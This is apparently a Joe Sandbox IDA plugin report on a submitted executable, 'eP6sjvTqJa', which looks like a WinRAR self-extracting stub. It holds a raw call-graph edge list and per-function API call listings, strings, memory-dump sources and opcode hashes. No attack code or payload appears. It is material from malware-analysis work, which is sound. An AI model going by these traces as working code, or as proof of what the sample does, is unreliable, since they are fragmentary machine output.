25160->25134 25162 b8921f __EH_prolog 25161->25162 25193 b87c64 25162->25193 25165 b813ba 78 API calls 25166 b89231 25165->25166 25196 b8d114 25166->25196 25168 b8928a 25168->25141 25170 b8d114 118 API calls 25171 b89243 25170->25171 25171->25168 25171->25170 25205 b8d300 97 API calls __InternalCxxFrameHandler 25171->25205 25172->25123 25173->25143 25174->25126 25176 b8d072 25175->25176 25177 b8d084 25175->25177 25206 b8603a 82 API calls 25176->25206 25207 b8603a 82 API calls 25177->25207 25180 b8d07c 25180->25127 25181->25141 25182->25143 25184 b922a1 25183->25184 25185 b922ba 25184->25185 25188 b922ce 25184->25188 25208 b90eed 86 API calls 25185->25208 25187 b922c1 25187->25188 25189->25123 25190->25150 25191->25156 25192->25155 25194 b8b146 GetVersionExW 25193->25194 25195 b87c69 25194->25195 25195->25165 25202 b8d12a __InternalCxxFrameHandler 25196->25202 25197 b8d29a 25198 b8d2ce 25197->25198 25199 b8d0cb 6 API calls 25197->25199 25200 b90e08 SetThreadExecutionState RaiseException 25198->25200 25199->25198 25203 b8d291 25200->25203 25201 b98c8d 103 API calls 25201->25202 25202->25197 25202->25201 25202->25203 25204 b8ac05 91 API calls 25202->25204 25203->25171 25204->25202 25205->25171 25206->25180 25207->25180 25208->25187 25209->24928 25210->24928 25211->24926 25213 b85d2a 25212->25213 25259 b85c4b 25213->25259 25216 b85d5d 25217 b85d95 25216->25217 25264 b8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25216->25264 25217->24943 25219 b88186 25218->25219 25220 b88232 25219->25220 25271 b8be5e 19 API calls __InternalCxxFrameHandler 25219->25271 25270 b91fac CharUpperW 25220->25270 25223 b8823b 25223->24946 25225 b87c22 25224->25225 25226 b87c5a 25225->25226 25272 b86e7a 74 API calls 25225->25272 25226->24951 25228 b87c52 25273 b8138b 74 API calls 25228->25273 25230->25010 25232 b89db3 25231->25232 25234 b89dc2 25231->25234 25233 b89db9 FlushFileBuffers 25232->25233 25232->25234 25233->25234 25235 b89e3f SetFileTime 25234->25235 25235->25014 
25236->24935 25237->24942 25238->24942 25239->24951 25240->24951 25241->24952 25242->24967 25243->24964 25244->24967 25246 b88b5a 25245->25246 25247 b898c5 GetFileType 25245->25247 25246->24978 25248 b82021 74 API calls 25246->25248 25247->25246 25248->24976 25249->24978 25250->24979 25251->25004 25252->25004 25253->25004 25254->25004 25255->25004 25256->25008 25257->25017 25258->25007 25265 b85b48 25259->25265 25262 b85b48 2 API calls 25263 b85c6c 25262->25263 25263->25216 25264->25216 25267 b85b52 25265->25267 25266 b85c3a 25266->25262 25266->25263 25267->25266 25269 b8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25267->25269 25269->25267 25270->25223 25271->25220 25272->25228 25273->25226 25275 b8cef2 25274->25275 25280 b8a99e 25275->25280 25277 b8cf24 25278 b8a99e 86 API calls 25277->25278 25279 b8cf2f 25278->25279 25281 b8a9c1 25280->25281 25284 b8a9d5 25280->25284 25285 b90eed 86 API calls 25281->25285 25283 b8a9c8 25283->25284 25284->25277 25285->25283 25286->25025 25288 b8a6a8 25287->25288 25289 b8a6c1 FindFirstFileW 25288->25289 25290 b8a727 FindNextFileW 25288->25290 25292 b8a6d0 25289->25292 25297 b8a709 25289->25297 25291 b8a732 GetLastError 25290->25291 25290->25297 25291->25297 25293 b8bb03 GetCurrentDirectoryW 25292->25293 25294 b8a6e0 25293->25294 25295 b8a6fe GetLastError 25294->25295 25296 b8a6e4 FindFirstFileW 25294->25296 25295->25297 25296->25295 25296->25297 25297->24876 25298->24679 25299->24687 25300->24687 25301->24690 25302->24698 25304 b89f42 78 API calls 25303->25304 25305 b81fe8 25304->25305 25306 b81a04 101 API calls 25305->25306 25309 b82005 25305->25309 25307 b81ff5 25306->25307 25307->25309 25310 b8138b 74 API calls 25307->25310 25309->24706 25309->24707 25310->25309 25312 b9b5bc GetDlgItem 25311->25312 25313 b9b583 GetMessageW 25311->25313 25312->24717 25312->24718 25314 b9b599 IsDialogMessageW 25313->25314 25315 b9b5a8 TranslateMessage DispatchMessageW 25313->25315 25314->25312 25314->25315 25315->25312 25316 b813e1 84 
API calls 2 library calls 25436 b994e0 GetClientRect 25437 b9f2e0 46 API calls __RTC_Initialize 25489 b921e0 26 API calls std::bad_exception::bad_exception 25438 babee0 GetCommandLineA GetCommandLineW 25318 b9eae7 25319 b9eaf1 25318->25319 25320 b9e85d ___delayLoadHelper2@8 14 API calls 25319->25320 25321 b9eafe 25320->25321 25439 b9f4e7 29 API calls _abort 25440 ba0ada 51 API calls 2 library calls 25385 b9e1d1 14 API calls ___delayLoadHelper2@8 25441 b9f4d3 20 API calls 25491 baa3d0 21 API calls _free 25492 bb2bd0 VariantClear 25389 b810d5 25394 b85abd 25389->25394 25395 b85ac7 __EH_prolog 25394->25395 25396 b8b505 84 API calls 25395->25396 25397 b85ad3 25396->25397 25401 b85cac GetCurrentProcess GetProcessAffinityMask 25397->25401 25402 b9e2d7 25403 b9e1db 25402->25403 25404 b9e85d ___delayLoadHelper2@8 14 API calls 25403->25404 25404->25403 25444 b962ca 123 API calls __InternalCxxFrameHandler 25495 b9b5c0 100 API calls 25496 b977c0 118 API calls 25497 b9ffc0 RaiseException _com_error::_com_error CallUnexpected 25411 b9dec2 25412 b9decf 25411->25412 25413 b8e617 53 API calls 25412->25413 25414 b9dedc 25413->25414 25415 b84092 _swprintf 51 API calls 25414->25415 25416 b9def1 SetDlgItemTextW 25415->25416 25417 b9b568 5 API calls 25416->25417 25418 b9df0e 25417->25418 25499 b9f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25500 b9ff30 LocalFree 23536 babb30 23537 babb39 23536->23537 23539 babb42 23536->23539 23540 baba27 23537->23540 23560 ba97e5 GetLastError 23540->23560 23542 baba34 23580 babb4e 23542->23580 23544 baba3c 23589 bab7bb 23544->23589 23547 baba53 23547->23539 23550 baba96 23614 ba8dcc 23550->23614 23554 baba91 23613 ba91a8 20 API calls _free 23554->23613 23556 babada 23556->23550 23620 bab691 26 API calls 23556->23620 23557 babaae 23557->23556 23558 ba8dcc _free 20 API calls 23557->23558 23558->23556 23561 ba97fb 23560->23561 23562 ba9801 23560->23562 23621 baae5b 11 API calls 2 
library calls 23561->23621 23566 ba9850 SetLastError 23562->23566 23622 bab136 23562->23622 23566->23542 23568 ba8dcc _free 20 API calls 23570 ba9821 23568->23570 23569 ba9830 23571 ba9837 23569->23571 23572 ba981b 23569->23572 23574 ba985c SetLastError 23570->23574 23630 ba9649 20 API calls _free 23571->23630 23572->23568 23631 ba8d24 38 API calls _abort 23574->23631 23575 ba9842 23577 ba8dcc _free 20 API calls 23575->23577 23579 ba9849 23577->23579 23579->23566 23579->23574 23581 babb5a ___scrt_is_nonwritable_in_current_image 23580->23581 23582 ba97e5 _abort 38 API calls 23581->23582 23585 babb64 23582->23585 23584 babbe8 _abort 23584->23544 23585->23584 23588 ba8dcc _free 20 API calls 23585->23588 23634 ba8d24 38 API calls _abort 23585->23634 23635 baac31 EnterCriticalSection 23585->23635 23636 babbdf LeaveCriticalSection _abort 23585->23636 23588->23585 23637 ba4636 23589->23637 23592 bab7ee 23594 bab805 23592->23594 23595 bab7f3 GetACP 23592->23595 23593 bab7dc GetOEMCP 23593->23594 23594->23547 23596 ba8e06 23594->23596 23595->23594 23597 ba8e44 23596->23597 23598 ba8e14 _free 23596->23598 23648 ba91a8 20 API calls _free 23597->23648 23598->23597 23600 ba8e2f RtlAllocateHeap 23598->23600 23647 ba7a5e 7 API calls 2 library calls 23598->23647 23600->23598 23601 ba8e42 23600->23601 23601->23550 23603 babbf0 23601->23603 23604 bab7bb 40 API calls 23603->23604 23605 babc0f 23604->23605 23608 babc60 IsValidCodePage 23605->23608 23610 babc16 23605->23610 23612 babc85 _abort 23605->23612 23607 baba89 23607->23554 23607->23557 23609 babc72 GetCPInfo 23608->23609 23608->23610 23609->23610 23609->23612 23659 b9fbbc 23610->23659 23649 bab893 GetCPInfo 23612->23649 23613->23550 23615 ba8dd7 RtlFreeHeap 23614->23615 23616 ba8e00 _free 23614->23616 23615->23616 23617 ba8dec 23615->23617 23616->23547 23740 ba91a8 20 API calls _free 23617->23740 23619 ba8df2 GetLastError 23619->23616 23620->23550 23621->23562 23628 bab143 _free 23622->23628 23623 bab183 23633 ba91a8 20 API 

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B90863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B9087C
                                                                                                                      • Part of subcall function 00B90863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B9088E
                                                                                                                      • Part of subcall function 00B90863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B908BF
                                                                                                                      • Part of subcall function 00B9A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B9A655
                                                                                                                      • Part of subcall function 00B9AC16: OleInitialize.OLE32(00000000), ref: 00B9AC2F
                                                                                                                      • Part of subcall function 00B9AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9AC66
                                                                                                                      • Part of subcall function 00B9AC16: SHGetMalloc.SHELL32(00BC8438), ref: 00B9AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00B9DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B9DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B9DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00B9DFCE
                                                                                                                      • Part of subcall function 00B9DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9DBF4
                                                                                                                      • Part of subcall function 00B9DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B9DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00BDEC90,00000800), ref: 00B9DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00BDEC90), ref: 00B9DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00B9E009
                                                                                                                    • _swprintf.LIBCMT ref: 00B9E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B9E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B9E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00B9E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B9E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 00B9E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 00B9E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 00B9E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 00B9E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3049964643-277078469
                                                                                                                    • Opcode ID: 6fe51c467af7051d85c210280c7814ca6b7be2192c90d91ed8b67a86adb0cc3a
                                                                                                                    • Instruction ID: 89db4f17ce7a523f107416b3c28c778b9faba70f24fdc757c33518f07f4d0c2a
                                                                                                                    • Opcode Fuzzy Hash: 6fe51c467af7051d85c210280c7814ca6b7be2192c90d91ed8b67a86adb0cc3a
                                                                                                                    • Instruction Fuzzy Hash: C061E371504255ABDB20AB79AC59F6B77ECEB48B00F0404BAF905A32A1EFB4D944C762

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9B73D,00000066), ref: 00B9A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B9A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B9A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B9A7C6
                                                                                                                      • Part of subcall function 00B9A626: GdipAlloc.GDIPLUS(00000010), ref: 00B9A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B9A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B9A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: PNG
                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                    • Opcode ID: 4f62a924a49a3f5ae6aefbd3c45c333693afd52acc06bc07985177f5f93e0e4f
                                                                                                                    • Instruction ID: 632a58ed567dd89e25ad058b320b5842a04547eae645f9349217f873fe9700d4
                                                                                                                    • Opcode Fuzzy Hash: 4f62a924a49a3f5ae6aefbd3c45c333693afd52acc06bc07985177f5f93e0e4f
                                                                                                                    • Instruction Fuzzy Hash: 56319E75601702AFCB119F65EC89D2B7BFCFF89B50B000A69F805A3261EF75DC408AA1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6C4
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: a833d706ec3e5fbaf9974933c4275037d7d1d55aa90b67cb922bd4443a144960
                                                                                                                    • Instruction ID: 7292970707e1acc6c493f83fb9b9a7047b857133c4f626c8abf1bd34a7fada67
                                                                                                                    • Opcode Fuzzy Hash: a833d706ec3e5fbaf9974933c4275037d7d1d55aa90b67cb922bd4443a144960
                                                                                                                    • Instruction Fuzzy Hash: 5C416D76900515ABCB25EF68CC84AE9B7F8FF48350F1042A6E559E3210DB34AE90DF90
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002,00000000), ref: 00BA7E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00BA7DC4,00000000,00BBC300,0000000C,00BA7F1B,00000000,00000002,00000000), ref: 00BA7E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00BA7E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 5c0efcad71bb30e9f97b14cddd385dd6819cfc855af1144372d1619faffab67d
                                                                                                                    • Instruction ID: da22a0e0856beb761c60954ce6f2fa0f758eb99e9c1b943d6a5bff7f33893830
                                                                                                                    • Opcode Fuzzy Hash: 5c0efcad71bb30e9f97b14cddd385dd6819cfc855af1144372d1619faffab67d
                                                                                                                    • Instruction Fuzzy Hash: EAE01232048148ABCB116F24CD09A4A3BAEEF11741B004595F8199B132CF76EE92CA80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9B7E5
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00B9B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B9B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B9B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00B9B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9B9B1
                                                                                                                      • Part of subcall function 00B9D453: _wcslen.LIBCMT ref: 00B9D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 00B9B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BA24
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B9D4D4: GetDlgItem.USER32(00000068,00BDFCB8), ref: 00B9D4E8
                                                                                                                      • Part of subcall function 00B9D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B9AF07,00000001,?,?,00B9B7B9,00BB506C,00BDFCB8,00BDFCB8,00001000,00000000,00000000), ref: 00B9D510
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9D51B
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9D529
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D53F
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9D559
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D59D
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9D5AB
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D5BA
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D5E1
                                                                                                                      • Part of subcall function 00B9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BB43F4), ref: 00B9D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B9BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B9BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 00B9BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00B9BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B9BB43
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B9BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00B9BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B9BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B9BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00B9BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B9BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B9BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00BB35F4), ref: 00B9BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00B9BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B9BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9BE68
                                                                                                                    • _wcslen.LIBCMT ref: 00B9BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 00B9BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B9BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00B9BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B9BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00B9BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,00BCA472), ref: 00B9BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B9C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B9C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00B9C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B9C1D9
                                                                                                                      • Part of subcall function 00B9C73F: __EH_prolog.LIBCMT ref: 00B9C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B9C1FD
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3445078344-1670982708

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00B9087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B9088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B908BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B90B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B90B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B90B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00BB3C7C,00000000), ref: 00B90BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B90C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B90C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BB3C7C,?,00000000,?,00000800), ref: 00B90C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00BB3C7C,00000800,?,00000000,?,00000800), ref: 00B90C9C
